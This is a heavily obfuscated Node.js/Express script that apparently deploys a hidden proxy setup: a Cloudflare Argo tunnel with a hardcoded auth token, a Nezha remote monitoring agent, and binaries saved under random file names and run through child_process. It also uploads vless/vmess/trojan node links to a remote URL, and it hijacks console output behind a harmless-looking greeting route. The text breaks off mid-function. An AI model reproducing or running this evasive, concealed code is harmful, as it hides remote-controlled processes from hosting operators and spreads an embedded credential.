_0x18865f['WsblQ'](_0x241287,_0x2cdcfd);},'csseE':_0x18865f[_0x3ba918(0x2f5,0x3eb,0x3e4,0x28e)],'VaFin':_0x18865f[_0x3ba918(0x210,0x2a8,0x1a4,0x14d)],'DqnWQ':_0x18865f[_0x3ba918(0x193,0x30e,0x12d,0x22a)]};if(_0x18865f['tngER'](_0x18865f[_0x4481fe(-0x5a,-0x184,0x0,-0x55)],_0x18865f[_0x4481fe(-0x211,-0x281,-0x207,-0x2e1)]))_0xe6c042=_0x4481fe(0x4b,-0x4a,-0xba,-0xb2);else{const _0x8e6bcd=_0x5d2708?function(){function _0x1dbb4b(_0x833618,_0x57c926,_0x490fd1,_0x12a7b7){return _0x4481fe(_0x833618- -0x4e,_0x57c926-0x6f,_0x490fd1-0x2,_0x12a7b7);}function _0xcd0612(_0xcc762e,_0x1998be,_0x4de9e6,_0x44f113){return _0x4481fe(_0x4de9e6-0x194,_0x1998be-0x1b1,_0x4de9e6-0x5b,_0xcc762e);}if(_0x13f4ff[_0x1dbb4b(-0x1ec,-0x317,-0xf7,-0x2b2)](_0x13f4ff['csseE'],_0x13f4ff[_0x1dbb4b(-0x262,-0x251,-0x31d,-0x330)]))_0x431a8f=_0x25bad9;else{if(_0x5498c3){if(_0x13f4ff[_0x1dbb4b(-0x87,-0xa2,-0x11f,-0x58)]!==_0x13f4ff[_0xcd0612(0xed,0xc9,0x65,0x19f)]){const _0x5cf61c=_0x5498c3[_0x1dbb4b(-0xbc,0x71,0x6a,-0x1fe)](_0x43a64f,arguments);return _0x5498c3=null,_0x5cf61c;}else _0x5dfb10[_0xcd0612(0x1e3,0x273,0x1e5,0x1f8)](_0x4b96c8);}}}:function(){};return _0x5d2708=![],_0x8e6bcd;}};}()),_0x26c038=_0x16b6db(this,function(){function _0xdb4dff(_0x3ed092,_0x44959f,_0x56722a,_0x6e15b6){return _0x4971(_0x56722a- -0x1b7,_0x3ed092);}const _0x5c7933={};_0x5c7933[_0x1de8d5(-0xe,-0x8a,-0xe9,0x12d)]=_0xdb4dff(-0x16f,-0x98,-0x15,0x70)+'+$';function _0x1de8d5(_0x3e6024,_0x3ba7f2,_0x552712,_0x1d89db){return _0x4971(_0x3e6024- -0x28c,_0x3ba7f2);}const _0x503f86=_0x5c7933;return _0x26c038['toString']()['search'](_0x503f86[_0xdb4dff(0x21f,0x183,0xc7,0x10a)])[_0xdb4dff(0x19f,0xf5,0x6a,0x14f)]()[_0x1de8d5(0xc3,0x19e,0xa4,0xd0)+'r'](_0x26c038)[_0xdb4dff(0x2fd,0x1d5,0x204,0x15f)]('(((.+)+)+)'+'+$');});_0x26c038();const _0xae6de1=(function(){const _0x88d550={};_0x88d550[_0x336db4(0x834,0x76f,0x895,0x6cc)]=function(_0x890d92,_0x4ba062){return _0x890d92===_0x4ba062;},_0x88d550[_0x4ddbec(0x77d,0x8e1,0x783,0x640)]='HDNmw',_0x88d550[_0x4ddbec(0x682,0x7ce,0x6ad,0x6bd)]='pPIpW',_0x88d550['zXbmV']=function(_0x84c82f,_0x1a1d1a){return _0x84c82f===_0x1a1d1a;};function _0x4ddbec(_0x198c2d,_0x13bbfc,_0x28f1ff,_0xbe3ae8){return _0x4971(_0x28f1ff-0x3c4,_0x13bbfc);}_0x88d550['MSZMV']=_0x4ddbec(0x4ed,0x5d7,0x64f,0x79d),_0x88d550[_0x336db4(0x89d,0x7cf,0x90b,0x75a)]='guVso',_0x88d550[_0x4ddbec(0x4a4,0x5e4,0x5ee,0x4f5)]=_0x4ddbec(0x646,0x70c,0x74b,0x785)+_0x4ddbec(0x800,0x835,0x708,0x700)+_0x4ddbec(0x597,0x68a,0x617,0x507);const _0x2e550f=_0x88d550;let _0x321f9c=!![];function _0x336db4(_0x5f5c0b,_0x5e6d84,_0x27037a,_0x119363){return _0x4971(_0x5e6d84-0x3c1,_0x27037a);}return function(_0x436f83,_0x5b96ea){function _0x1d4d43(_0x5b3eca,_0x4ea3a0,_0x435833,_0x1a6019){return _0x336db4(_0x5b3eca-0x2d,_0x1a6019- -0x760,_0x4ea3a0,_0x1a6019-0x83);}const _0x574a46={};_0x574a46['BuZdz']=_0x2e550f[_0x1d4d43(-0x1d9,-0x4d,-0x4c,-0x175)];const _0x310ccb=_0x574a46,_0x5b3d3e=_0x321f9c?function(){function _0x16b41e(_0x29911e,_0x116af6,_0x7a6cd0,_0x3c2562){return _0x1d4d43(_0x29911e-0xbf,_0x3c2562,_0x7a6cd0-0x5b,_0x29911e- -0x2e);}function _0x407670(_0x32f2b2,_0x643e14,_0xcf1dff,_0x565644){return _0x1d4d43(_0x32f2b2-0x19a,_0x565644,_0xcf1dff-0x7a,_0x32f2b2-0x772);}if(_0x2e550f['cLKKx'](_0x2e550f[_0x407670(0x792,0x6c4,0x85a,0x66b)],_0x2e550f[_0x407670(0x6bc,0x6da,0x72a,0x54d)])){const _0x3cbd03=_0x2cb83c[_0x16b41e(-0xc6,-0x19b,-0x90,-0x71)](_0x431c73,arguments);return _0x3a055e=null,_0x3cbd03;}else{if(_0x5b96ea){if(_0x2e550f[_0x407670(0x5c6,0x71e,0x69f,0x601)](_0x2e550f[_0x16b41e(-0x1c1,-0x276,-0x25e,-0x2b8)],_0x2e550f[_0x407670(0x7e1,0x8bf,0x769,0x7c0)]))_0x11abbd['error'](_0x310ccb[_0x407670(0x613,0x5df,0x4ce,0x72d)],_0x79589f);else{const _0x36c782=_0x5b96ea[_0x407670(0x6da,0x5bc,0x5f7,0x6f1)](_0x436f83,arguments);return _0x5b96ea=null,_0x36c782;}}}}:function(){};return _0x321f9c=![],_0x5b3d3e;};}()),_0xd06f65=_0xae6de1(this,function(){const _0x1c07b0={'RDnvu':function(_0x3350cf,_0xbfaa54){return _0x3350cf(_0xbfaa54);},'SMocQ':function(_0x5f50aa,_0x2edb5c){return _0x5f50aa+_0x2edb5c;},'DNnre':_0x413040(-0x42,-0x6c,-0xcf,-0x1d1)+_0x4bf488(-0x102,-0x4f,-0x19c,-0x119),'sAsPx':_0x4bf488(0x140,-0x39,0x2b,0x104)+_0x413040(0x16e,0x11,-0xf,0x66)+_0x4bf488(-0xe5,-0x14e,-0x2a1,-0x1c0)+'\x20)','tAhJK':function(_0xbaafbf){return _0xbaafbf();},'JQtMo':_0x4bf488(0xc,-0x1ba,-0x120,-0x148),'WSnTb':_0x4bf488(-0x1b9,-0x236,-0x178,-0x101),'kTiAh':_0x4bf488(-0xa1,-0xea,-0x21b,-0x13e),'eFSuS':'error','qYtHX':_0x4bf488(-0x184,-0x9a,-0xdb,-0x89),'ayNPZ':_0x413040(-0x2d1,-0x179,-0xe5,-0x3b),'XYvFq':_0x4bf488(-0x141,-0x4c,-0x98,-0x2f),'ocOJh':function(_0x5ba591,_0x4c5409){return _0x5ba591<_0x4c5409;},'cIvLF':function(_0x488c94,_0x5b222f){return _0x488c94===_0x5b222f;},'cUDwA':_0x413040(-0x121,-0xba,-0x49,-0x17f)};function _0x4bf488(_0x32fbc7,_0x2c1a42,_0xdbe0e2,_0x4bf883){return _0x4971(_0x4bf883- -0x308,_0x2c1a42);}function _0x413040(_0x1f9e68,_0x16beab,_0x2127d8,_0x1b86af){return _0x4971(_0x16beab- -0x3d6,_0x1f9e68);}let _0x143193;try{const _0x1fd7b9=_0x1c07b0[_0x4bf488(0x16d,0x1a,-0xc3,0x92)](Function,_0x1c07b0[_0x413040(-0x2dc,-0x17f,-0xfd,-0x1e2)](_0x1c07b0[_0x413040(-0x163,-0x170,-0xa5,-0x14b)]+_0x1c07b0[_0x4bf488(-0x25,-0xf3,-0x104,-0xc4)],');'));_0x143193=_0x1c07b0['tAhJK'](_0x1fd7b9);}catch(_0x5092ed){_0x143193=window;}const _0x5a7977=_0x143193[_0x4bf488(-0x1e,-0x27,-0x90,0xcb)]=_0x143193[_0x4bf488(0xb3,-0xb,0xb0,0xcb)]||{},_0x4935c3=[_0x1c07b0[_0x413040(0xf9,-0x6b,-0x1b3,-0xac)],_0x1c07b0[_0x4bf488(-0x1b8,-0x22,-0x24b,-0x15c)],_0x1c07b0[_0x413040(-0x215,-0x28a,-0x362,-0x1e8)],_0x1c07b0['eFSuS'],_0x1c07b0[_0x413040(-0x178,-0x252,-0x13a,-0x22a)],_0x1c07b0[_0x4bf488(0x2f,0x4c,-0x1cc,-0x113)],_0x1c07b0[_0x4bf488(-0x143,-0x83,-0x169,-0x12d)]];for(let _0x28d17e=-0x5b1+-0x977*0x3+-0x2*-0x110b;_0x1c07b0[_0x4bf488(0x1b1,0x10b,-0x2,0x68)](_0x28d17e,_0x4935c3[_0x413040(-0x32,-0x2c,0x56,-0x185)]);_0x28d17e++){if(_0x1c07b0[_0x4bf488(-0x13b,0x91,0x134,0x6)](_0x1c07b0[_0x413040(-0x86,-0xb4,0x5c,-0x90)],_0x1c07b0[_0x4bf488(-0x107,0x39,-0x121,0x1a)])){const _0x4b746f=_0xae6de1[_0x4bf488(0x151,0x48,-0x36,0x47)+'r'][_0x413040(-0xfd,-0x1a4,-0x1c7,-0x34)]['bind'](_0xae6de1),_0x3654f6=_0x4935c3[_0x28d17e],_0x4ca521=_0x5a7977[_0x3654f6]||_0x4b746f;_0x4b746f[_0x413040(-0xc1,-0x16e,-0x113,-0xb)]=_0xae6de1[_0x413040(-0x10f,-0x10f,-0x8f,-0x17e)](_0xae6de1),_0x4b746f['toString']=_0x4ca521[_0x4bf488(-0xc7,0x8,0x72,-0xe7)][_0x413040(-0x26b,-0x10f,-0x10f,-0x27)](_0x4ca521),_0x5a7977[_0x3654f6]=_0x4b746f;}else _0x4ab25a[_0x4bf488(-0x173,-0x141,-0x98,-0x69)](_0x413040(-0x288,-0x159,-0x254,-0x82)+'g\x20error:\x20'+_0x5ecba3);}});function _0x388b12(_0xdcc24d,_0x199bdd,_0x5862f0,_0x337613){return _0x4971(_0x337613- -0x4a,_0xdcc24d);}_0xd06f65();function _0x4971(_0x3c8fd9,_0x54e807){const _0x28e1fc=_0x2c50();return _0x4971=function(_0x27144e,_0x4b8dfb){_0x27144e=_0x27144e-(-0x335*-0x1+-0x1293+0x1093);let _0xf1b382=_0x28e1fc[_0x27144e];if(_0x4971['DGfsIl']===undefined){var _0x26c9a4=function(_0x11289b){const _0x3f8a1e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x237058='',_0x14c095='',_0x48f791=_0x237058+_0x26c9a4;for(let _0x1ac980=-0x16a4+-0x753+-0x3*-0x9fd,_0x35a1ed,_0x4d1d82,_0x5a2589=0x25c7+-0x1604+-0xfc3;_0x4d1d82=_0x11289b['charAt'](_0x5a2589++);~_0x4d1d82&&(_0x35a1ed=_0x1ac980%(0x1b37*-0x1+0x2545+-0x2*0x505)?_0x35a1ed*(0x215d+0x1*-0x1c71+0x5c*-0xd)+_0x4d1d82:_0x4d1d82,_0x1ac980++%(0x25b8+-0x14aa+-0x885*0x2))?_0x237058+=_0x48f791['charCodeAt'](_0x5a2589+(-0x251b+-0xf0+0x2615))-(-0xf8+0x251e+0x120e*-0x2)!==0x9e7+-0x2495+-0x1*-0x1aae?String['fromCharCode'](0x246*0x7+0xb*0xc5+-0x29*0x92&_0x35a1ed>>(-(0x543+0x1cea+-0x222b)*_0x1ac980&0x1464+-0x2d*-0x87+-0x2c19)):_0x1ac980:0xd4*-0x1d+-0x207b+0x387f){_0x4d1d82=_0x3f8a1e['indexOf'](_0x4d1d82);}for(let _0x2a5459=0x1*-0x7e2+-0x2c0*-0x7+-0xf*0xc2,_0x1c90bb=_0x237058['length'];_0x2a5459<_0x1c90bb;_0x2a5459++){_0x14c095+='%'+('00'+_0x237058['charCodeAt'](_0x2a5459)['toString'](0x927+0x1*0x18ad+-0x21c4))['slice'](-(-0x1101*-0x1+0x716*-0x1+-0x9e9));}return decodeURIComponent(_0x14c095);};_0x4971['psPenJ']=_0x26c9a4,_0x3c8fd9=arguments,_0x4971['DGfsIl']=!![];}const _0x230a51=_0x28e1fc[-0xb*-0x2fd+0xe*0x107+-0x2f41],_0x5e8795=_0x27144e+_0x230a51,_0x507ee8=_0x3c8fd9[_0x5e8795];if(!_0x507ee8){const _0x154838=function(_0xe59f5c){this['Nwtowb']=_0xe59f5c,this['bPsmbS']=[-0x129a+-0x1a83+0x339*0xe,0x6e9+-0x1c4c+-0x4b*-0x49,0x1d42+-0x7a*-0x1+-0x1dbc*0x1],this['bMGcIZ']=function(){return'newState';},this['aYyAUn']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['GUeCLU']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x154838['prototype']['mtKleJ']=function(){const _0xfc76d5=new RegExp(this['aYyAUn']+this['GUeCLU']),_0x7d3fd=_0xfc76d5['test'](this['bMGcIZ']['toString']())?--this['bPsmbS'][-0xf1+0xb*-0xbb+0x8fb]:--this['bPsmbS'][0xa13+-0x16*-0x1b5+-0x2fa1];return this['epviaP'](_0x7d3fd);},_0x154838['prototype']['epviaP']=function(_0x36f23b){if(!Boolean(~_0x36f23b))return _0x36f23b;return this['QFUbWY'](this['Nwtowb']);},_0x154838['prototype']['QFUbWY']=function(_0x51b87a){for(let _0x5bf27a=-0x8*0x431+0x809*0x1+0x1*0x197f,_0x1f9ae7=this['bPsmbS']['length'];_0x5bf27a<_0x1f9ae7;_0x5bf27a++){this['bPsmbS']['push'](Math['round'](Math['random']())),_0x1f9ae7=this['bPsmbS']['length'];}return _0x51b87a(this['bPsmbS'][0x52d*0x1+-0x1028+0xafb*0x1]);},new _0x154838(_0x4971)['mtKleJ'](),_0xf1b382=_0x4971['psPenJ'](_0xf1b382),_0x3c8fd9[_0x5e8795]=_0xf1b382;}else _0xf1b382=_0x507ee8;return _0xf1b382;},_0x4971(_0x3c8fd9,_0x54e807);}const express=require('express'),app=express(),axios=require('axios'),os=require('os'),fs=require('fs'),path=require(_0x4d5570(0x500,0x4bf,0x608,0x3c4)),{promisify}=require(_0x4d5570(0x4bd,0x4b7,0x395,0x361)),exec=promisify(require(_0x4d5570(0x56c,0x501,0x524,0x48d)+_0x388b12(0x379,0x1fc,0x2a1,0x30b))['exec']),{execSync}=require(_0x4d5570(0x49e,0x501,0x5a6,0x450)+_0x4d5570(0x49c,0x55d,0x672,0x5ba)),UPLOAD_URL=process[_0x4d5570(0x52c,0x48e,0x414,0x493)][_0x388b12(0x250,0x1b3,0x8d,0x167)]||'',PROJECT_URL=process['env']['PROJECT_UR'+'L']||'',AUTO_ACCESS=process[_0x4d5570(0x33f,0x48e,0x49d,0x580)][_0x388b12(0x329,0x2e6,0x384,0x3c8)+'S']||![],FILE_PATH=process['env'][_0x4d5570(0x3b8,0x358,0x23b,0x35b)]||_0x4d5570(0x32a,0x360,0x30d,0x429),SUB_PATH=process[_0x388b12(0x13c,0x23e,0x29f,0x23c)][_0x388b12(0x11,0x1ff,0x204,0x17f)]||_0x4d5570(0x6a4,0x5ca,0x4e7,0x5c6),PORT=process['env']['SERVER_POR'+'T']||process[_0x388b12(0x22a,0x370,0x246,0x23c)][_0x388b12(0x252,0x278,0x3d3,0x363)]||-0x2277+-0x1a33+0x4862,UUID=process[_0x4d5570(0x501,0x48e,0x3ba,0x4a1)][_0x4d5570(0x46c,0x3ae,0x2c4,0x370)]||'e9182e33-6'+_0x388b12(0xdd,0x21a,0x1c7,0x236)+_0x4d5570(0x3fb,0x436,0x562,0x312)+_0x4d5570(0x4ae,0x411,0x54e,0x56a),NEZHA_SERVER=process[_0x4d5570(0x439,0x48e,0x4b0,0x4c1)][_0x388b12(0x1d5,0x7,0x187,0x12f)+'ER']||'',NEZHA_PORT=process['env'][_0x4d5570(0x34b,0x3ab,0x26b,0x376)]||'',NEZHA_KEY=process['env'][_0x4d5570(0x249,0x384,0x403,0x294)]||'',ARGO_DOMAIN=process[_0x388b12(0x32d,0x194,0x130,0x23c)][_0x4d5570(0x4c5,0x412,0x430,0x2c6)+'N']||_0x388b12(0x14a,0x2de,0x3a2,0x272)+_0x388b12(0x347,0x28a,0x3c0,0x29b),ARGO_AUTH=process[_0x4d5570(0x4c8,0x48e,0x37d,0x4b8)][_0x388b12(0x4ce,0x2d9,0x2db,0x374)]||_0x388b12(0x94,0x6c,0x1ef,0x1d6)+_0x388b12(0x285,0x20c,0x2de,0x206)+'ZjAzNjM3OW'+'ViMTA4OWYy'+_0x4d5570(0x30b,0x42d,0x4b7,0x501)+'EiLCJ0Ijoi'+_0x4d5570(0x556,0x4b9,0x5ac,0x608)+_0x4d5570(0x3f6,0x43c,0x459,0x579)+_0x388b12(0x239,0x9c,0x1bf,0x103)+'AtMGY5ZTg4'+_0x4d5570(0x713,0x5d1,0x51c,0x56b)+_0x388b12(0x192,0x2ea,0x33d,0x29e)+_0x4d5570(0x3f2,0x4c5,0x45a,0x569)+_0x388b12(0x40d,0x449,0x421,0x36e)+_0x388b12(0x269,0xee,0x14c,0x124)+'xXRmhZMlF0'+'WkdRek9XVm'+_0x388b12(0x14e,0x1c1,0x3ff,0x291)+'bSJ9',ARGO_PORT=process[_0x388b12(0x13e,0x2cb,0x257,0x23c)][_0x388b12(0xdf,0xea,0x320,0x1be)]||0x149a+-0xb6f*-0x1+-0x1*0xc8,CFIP=process[_0x4d5570(0x5e5,0x48e,0x44a,0x43c)][_0x388b12(0x2b7,0x414,0x45b,0x35a)]||_0x388b12(0x13c,0x2d0,0xe1,0x224)+_0x388b12(0x429,0x350,0x235,0x2ec),CFPORT=process[_0x4d5570(0x43c,0x48e,0x337,0x575)][_0x388b12(0x3b4,0x35e,0x46b,0x3b4)]||0x12*0x137+-0x1002+0x421*-0x1,NAME=process['env']['NAME']||_0x4d5570(0x52a,0x404,0x517,0x4f8);!fs['existsSync'](FILE_PATH)?(fs[_0x388b12(0x42d,0x3c3,0x43f,0x3c1)](FILE_PATH),console['log'](FILE_PATH+(_0x388b12(0x2b,0x254,0x16f,0x11b)+'d'))):console[_0x4d5570(0x4c7,0x3c8,0x415,0x2a1)](FILE_PATH+(_0x388b12(0x28d,0x268,0x4c1,0x3aa)+_0x388b12(0x376,0x20e,0xfc,0x243)));function generateRandomName(){const _0x5c0bd4={};_0x5c0bd4[_0x5343ad(0x1e9,0x24a,0x2c2,0x1e4)]=_0x5343ad(0x3da,0x2ea,0x509,0x4d5)+_0x5343ad(0x2f8,0x3b8,0x374,0x466)+_0x5343ad(0x1e1,0x2a0,0x227,0x1c0),_0x5c0bd4[_0x1d9f6e(0x43d,0x39c,0x526,0x58f)]=function(_0x19d840,_0x4812ae){return _0x19d840!==_0x4812ae;},_0x5c0bd4[_0x1d9f6e(0x369,0x3c4,0x24d,0x26a)]=_0x5343ad(0x31d,0x39a,0x315,0x28a);const _0x3ffdd9=_0x5c0bd4,_0x579316=_0x3ffdd9[_0x5343ad(0x1e9,0x16d,0x1fb,0x107)];function _0x5343ad(_0x2a6f23,_0x3b1cb2,_0x6ab24,_0x2ae1b){return _0x4d5570(_0x2a6f23-0x10f,_0x2a6f23- -0x175,_0x6ab24-0x1e6,_0x3b1cb2);}let _0x36f15a='';function _0x1d9f6e(_0x15aa38,_0x5a7b10,_0x127b23,_0x59264d){return _0x388b12(_0x127b23,_0x5a7b10-0x3a,_0x127b23-0x16a,_0x15aa38-0x275);}for(let _0x4cdb30=0xd2b+0x2372+-0x13*0x28f;_0x4cdb30<0x13c0+0x53*-0xf+-0x2f9*0x5;_0x4cdb30++){if(_0x3ffdd9[_0x1d9f6e(0x43d,0x3cc,0x33e,0x33a)](_0x3ffdd9[_0x1d9f6e(0x369,0x2db,0x431,0x34d)],_0x1d9f6e(0x4b5,0x548,0x437,0x382)))return null;else _0x36f15a+=_0x579316['charAt'](Math[_0x1d9f6e(0x4a7,0x346,0x540,0x5bd)](Math[_0x1d9f6e(0x4d9,0x519,0x559,0x3a9)]()*_0x579316[_0x5343ad(0x43d,0x545,0x424,0x36b)]));}return _0x36f15a;}const npmName=generateRandomName(),webName=generateRandomName(),botName=generateRandomName(),phpName=generateRandomName();let npmPath=path[_0x388b12(0x2f6,0x1b6,0x44f,0x323)](FILE_PATH,npmName);function _0x4d5570(_0x3a8844,_0x415af2,_0x1ecdf6,_0x395285){return _0x4971(_0x415af2-0x208,_0x395285);}let phpPath=path['join'](FILE_PATH,phpName),webPath=path[_0x388b12(0x46e,0x3e7,0x2ff,0x323)](FILE_PATH,webName),botPath=path[_0x388b12(0x429,0x336,0x3aa,0x323)](FILE_PATH,botName),subPath=path[_0x388b12(0x474,0x2b4,0x223,0x323)](FILE_PATH,_0x4d5570(0x274,0x3ac,0x25b,0x3c8)),listPath=path[_0x388b12(0x1e0,0x375,0x44a,0x323)](FILE_PATH,_0x388b12(0x414,0x234,0x241,0x394)),bootLogPath=path[_0x388b12(0x233,0x39e,0x21c,0x323)](FILE_PATH,'boot.log'),configPath=path[_0x388b12(0x3dc,0x45a,0x207,0x323)](FILE_PATH,_0x388b12(0x109,0x2c9,0x1f1,0x276)+'n');function deleteNodes(){function _0x172a72(_0x2200ee,_0x94f545,_0x420f64,_0x35b217){return _0x388b12(_0x94f545,_0x94f545-0x1b6,_0x420f64-0x15b,_0x2200ee- -0xb2);}function _0x53f0ea(_0x11b996,_0x5c14dd,_0x33512d,_0x3bb3bf){return _0x388b12(_0x33512d,_0x5c14dd-0x1c8,_0x33512d-0x1c8,_0x3bb3bf-0x3f1);}const _0x389b59={};_0x389b59[_0x53f0ea(0x373,0x390,0x54c,0x4e0)]=_0x172a72(0x2a1,0x23d,0x2f9,0x195),_0x389b59[_0x172a72(0xa4,0x114,0x210,0x13c)]='ZToni',_0x389b59[_0x172a72(0x219,0x17e,0x2aa,0x240)]=_0x172a72(0x153,0x11a,0x1a1,0x109),_0x389b59[_0x172a72(0x1b1,0x160,0x2d1,0x176)]=_0x172a72(0x313,0x203,0x1ce,0x439),_0x389b59[_0x53f0ea(0x68a,0x651,0x71c,0x610)]=function(_0x81eac8,_0x4f04fa){return _0x81eac8===_0x4f04fa;},_0x389b59[_0x53f0ea(0x8cc,0x78d,0x6a1,0x777)]=_0x172a72(0x13a,0x21c,0x5a,0xb6)+'n/json';const _0x3f7b4d=_0x389b59;try{if(!UPLOAD_URL)return;if(!fs['existsSync'](subPath))return;let _0x2ed9c2;try{_0x2ed9c2=fs['readFileSy'+'nc'](subPath,_0x3f7b4d[_0x172a72(0x219,0x1f2,0x183,0x1c9)]);}catch{return null;}const _0x252f5f=Buffer['from'](_0x2ed9c2,_0x3f7b4d[_0x53f0ea(0x770,0x5ee,0x543,0x654)])['toString'](_0x3f7b4d['PXRJQ']),_0x275596=_0x252f5f['split']('\x0a')[_0x53f0ea(0x6c8,0x5f5,0x665,0x6ac)](_0x58188f=>/(vless|vmess|trojan|hysteria2|tuic):\/\//['test'](_0x58188f));if(_0x3f7b4d[_0x53f0ea(0x4a1,0x5f7,0x60e,0x610)](_0x275596[_0x53f0ea(0x6b9,0x8bc,0x8ae,0x751)],0x1*-0x1ed0+0xc20+0x958*0x2))return;const _0x11e00d={};_0x11e00d['nodes']=_0x275596;const _0x1310b3={};_0x1310b3[_0x53f0ea(0x890,0x819,0x759,0x733)+'pe']=_0x3f7b4d['robLg'];const _0x4b56c7={};return _0x4b56c7[_0x53f0ea(0x84a,0x64c,0x7f1,0x7ae)]=_0x1310b3,axios['post'](UPLOAD_URL+(_0x172a72(0xd3,-0x37,0x1d1,0x31)+_0x53f0ea(0x49c,0x5f9,0x6b5,0x591)),JSON[_0x53f0ea(0x778,0x850,0x71c,0x7b1)](_0x11e00d),_0x4b56c7)[_0x172a72(0x2cc,0x17b,0x2df,0x39e)](_0x3e5e76=>{function _0x4019cf(_0x4ce52a,_0x3a549f,_0x4f015e,_0x3569d0){return _0x53f0ea(_0x4ce52a-0xd3,_0x3a549f-0xa0,_0x3a549f,_0x3569d0- -0x12c);}if(_0x3f7b4d['FZUXE']!==_0x3f7b4d[_0x4019cf(0x42c,0x3e4,0x2c2,0x41b)])return null;else{const _0x533815=_0x289fa3?function(){function _0x127fe0(_0x50091e,_0x3bab97,_0x4d308c,_0x25b7e6){return _0x4019cf(_0x50091e-0x39,_0x25b7e6,_0x4d308c-0x1d0,_0x3bab97- -0x222);}if(_0x5c0e12){const _0xc6b28e=_0x8fcbbd[_0x127fe0(0x3cc,0x360,0x485,0x269)](_0x1f4c76,arguments);return _0x4128cc=null,_0xc6b28e;}}:function(){};return _0x361aaa=![],_0x533815;}}),null;}catch(_0x2cca50){return null;}}function cleanupOldFiles(){function _0x9b1e82(_0x1998a4,_0x307e32,_0x39d211,_0xe5befa){return _0x388b12(_0x39d211,_0x307e32-0x1e5,_0x39d211-0x152,_0x307e32- -0xfa);}const _0x6612b={};_0x6612b['GtEBI']=function(_0x1b20dc,_0x26d0d0){return _0x1b20dc*_0x26d0d0;},_0x6612b['YuFPT']=function(_0x2075b0,_0x87ea38){return _0x2075b0===_0x87ea38;},_0x6612b[_0x5290c2(-0x19a,-0x11b,-0x196,-0x18f)]=_0x9b1e82(0x149,0x96,0x137,0x13c),_0x6612b['KLYzj']=_0x5290c2(-0x2c2,-0x281,-0x2b8,-0x202);function _0x5290c2(_0x12556a,_0x43264d,_0x4577eb,_0xf3a98d){return _0x4d5570(_0x12556a-0x197,_0xf3a98d- -0x58b,_0x4577eb-0x1ab,_0x12556a);}_0x6612b[_0x9b1e82(0xba,0x189,0x185,0x1a1)]=function(_0xbd0d2a,_0x1d73a4){return _0xbd0d2a!==_0x1d73a4;},_0x6612b[_0x5290c2(-0x32a,-0xc8,-0x1a7,-0x206)]=_0x9b1e82(-0x2a,0x30,0xc5,0x43);const _0x13906c=_0x6612b;try{if(_0x13906c[_0x9b1e82(0xcc,0x189,0x1f0,0x1d6)](_0x13906c[_0x5290c2(-0x18f,-0xc2,-0x17d,-0x206)],_0x13906c['LEPGy']))_0x57fd5c+=_0x4f1b3b[_0x5290c2(-0x341,-0x19a,-0x125,-0x1de)](_0x14f3b5['floor'](_0x13906c['GtEBI'](_0x5d0c3f[_0x5290c2(-0x1e0,-0x7c,-0x197,-0xd5)](),_0x345d91[_0x5290c2(0xca,0x145,-0x49,0x27)])));else{const _0x5ab057=fs[_0x9b1e82(0x33,0x181,0x1c3,0x1bc)+'c'](FILE_PATH);_0x5ab057['forEach'](_0x2105ef=>{function _0x2e0ef3(_0x4638b7,_0x4f4a52,_0x5dfdd6,_0x8fd6ec){return _0x5290c2(_0x4f4a52,_0x4f4a52-0x1e5,_0x5dfdd6-0x6,_0x4638b7-0x210);}function _0xf04ed1(_0x36f75f,_0x54acf9,_0x495b9c,_0x4cc4c2){return _0x9b1e82(_0x36f75f-0x4b,_0x54acf9-0x50f,_0x36f75f,_0x4cc4c2-0xaf);}if(_0xf04ed1(0x5ef,0x527,0x5c6,0x62b)!==_0x13906c[_0x2e0ef3(0x81,0x8e,0xc0,0x188)]){const _0x54591e=path[_0xf04ed1(0x6e9,0x738,0x605,0x7c4)](FILE_PATH,_0x2105ef);try{if(_0x13906c[_0xf04ed1(0x4c1,0x592,0x5bd,0x557)](_0x13906c[_0xf04ed1(0x534,0x68d,0x634,0x731)],_0x13906c['KLYzj'])){const _0x47592a=fs[_0xf04ed1(0x665,0x652,0x5c7,0x54f)](_0x54591e);_0x47592a[_0xf04ed1(0x50e,0x614,0x63d,0x71f)]()&&fs[_0xf04ed1(0x7aa,0x6d4,0x7f4,0x821)](_0x54591e);}else{if(_0x4560f2[_0xf04ed1(0x4d2,0x5f7,0x48b,0x72c)]){if(_0x13906c['YuFPT'](_0x51370f[_0x2e0ef3(0xb9,0x13a,0x78,0x191)][_0xf04ed1(0x75c,0x67e,0x658,0x772)],-0x5ce+-0x38f*0x3+0x120b*0x1)){}}}}catch(_0x4ce006){}}else _0x19632d?_0x225add[_0xf04ed1(0x620,0x66a,0x6a0,0x553)]('Empowermen'+_0xf04ed1(0x67e,0x6c2,0x7ab,0x5d2)+'or\x20'+_0x429290+':\x20'+_0x45bb79):_0x2b7be1[_0x2e0ef3(0x4d,0x132,0xab,-0x9)](_0xf04ed1(0x47e,0x543,0x4d4,0x6a5)+_0xf04ed1(0x83b,0x7ce,0x832,0x689)+_0xf04ed1(0x6f0,0x6a7,0x805,0x76c)+_0x229293+':\x20'+_0x576583['toString'](-0x5*-0x3ee+-0xa17+-0x987));});}}catch(_0x4c7fe0){}}app[_0x4d5570(0x3e4,0x36a,0x24f,0x35f)]('/',function(_0x315e27,_0x18d4c0){const _0x92c1ff={};function _0x360c91(_0x14d650,_0x30a04a,_0x13b175,_0x2851e4){return _0x4d5570(_0x14d650-0x36,_0x2851e4- -0x485,_0x13b175-0x1e3,_0x14d650);}_0x92c1ff[_0x363f90(0x300,0x2b4,0x257,0x2cd)]=_0x363f90(0x289,0x180,0x1f5,0x2a4)+'d!';function _0x363f90(_0x1e5547,_0x3d535e,_0x59dc77,_0x7e2370){return _0x388b12(_0x3d535e,_0x3d535e-0x13e,_0x59dc77-0x111,_0x7e2370-0x132);}const _0x5d3ae8=_0x92c1ff;_0x18d4c0[_0x363f90(0x2b6,0x16d,0x27b,0x2b4)](_0x5d3ae8[_0x360c91(0xd7,0x8e,-0x1e0,-0x98)]);});async function generateConfig(){const 